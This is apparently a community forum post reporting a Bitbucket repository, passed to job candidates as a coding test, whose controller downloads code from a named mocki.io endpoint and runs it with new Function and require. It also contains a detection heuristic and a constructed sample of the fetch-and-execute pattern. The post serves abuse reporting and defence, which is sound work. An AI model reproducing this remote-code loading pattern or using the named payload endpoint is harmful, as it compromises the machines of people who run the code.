Hello,
The following public repository contains malicious code:
https://bitbucket.org/ethvault-tech-team/ethvault/src/master/
In file server/controllers/productController.js, the function `getCookie` downloads arbitrary code from:
https://api.mocki.io/v2/964ug6uu
and executes it locally using `new Function(...)` with `require`.
This is a Remote Code Execution vulnerability that could fully compromise a user’s machine.
The repository has been online since July 10, 2025 and is being shared with job candidates as a “technical test”.
Please investigate and take action to remove or restrict this repository.
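A heuristic static check for the pattern the report describes (text fetched over the network, compiled with `new Function`, and given `require`), added here as an example; it is not part of the original post or of the repository. The function names, severity labels and the two sample sources are assumptions constructed for illustration.

```javascript
// Added example: flag `new Function(...)` calls whose body is runtime data and that receive `require`.
const NETWORK = /\b(?:axios(?:\.\w+)?|fetch|https?\.(?:get|request))\s*\(/;

// Find the parenthesis matching the one at `open`, ignoring parentheses inside string literals.
function matchParen(src, open) {
  let depth = 0, quote = null;
  for (let i = open; i < src.length; i++) {
    const c = src[i];
    if (quote) {
      if (c === '\\') i++;                 // skip the escaped character
      else if (c === quote) quote = null;
    } else if (c === '"' || c === "'" || c === '`') quote = c;
    else if (c === '(') depth++;
    else if (c === ')' && --depth === 0) return i;
  }
  return -1;                               // unbalanced input
}

function scanSource(file, src) {
  const findings = [];
  const hasNetwork = NETWORK.test(src);    // any HTTP client call in the same file
  const ctor = /\bnew\s+Function\s*\(/g;
  for (let m; (m = ctor.exec(src)) !== null;) {
    const open = m.index + m[0].length - 1;
    const close = matchParen(src, open);
    if (close < 0) continue;
    const args = src.slice(open + 1, close);
    // The last argument is the function body; anything but a quoted literal is runtime data.
    const dynamicBody = !/['"]\s*$/.test(args);
    // `require` as a parameter lets the generated code load fs, child_process and so on.
    const getsRequire = /\brequire\b/.test(args);
    const severity = dynamicBody && getsRequire && hasNetwork ? 'high'
      : dynamicBody ? 'medium' : 'low';
    findings.push({ file, line: src.slice(0, m.index).split('\n').length, severity });
  }
  return findings;
}

// Constructed samples (not the repository's code); the URL is a placeholder.
const SAMPLE_SUSPICIOUS = `
const axios = require('axios');
async function getCookie() {
  const res = await axios.get('https://example.invalid/placeholder');
  const handler = new Function('require', res.data.cookie);
  handler(require);
}
`;
const SAMPLE_BENIGN = `
const add = new Function('a', 'b', 'return a + b');
`;
console.log(scanSource('suspicious.js', SAMPLE_SUSPICIOUS), scanSource('benign.js', SAMPLE_BENIGN));
```

This is a text heuristic, not a parser: a hit is a reason to read the file before running `npm install` or starting the server, and a clean result does not prove the code is safe.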
Welcome to Atlassian Community!
Please report this to abuse@atlassian.com and they will take action on it. Just note that the team will not reply back.
Ok, thx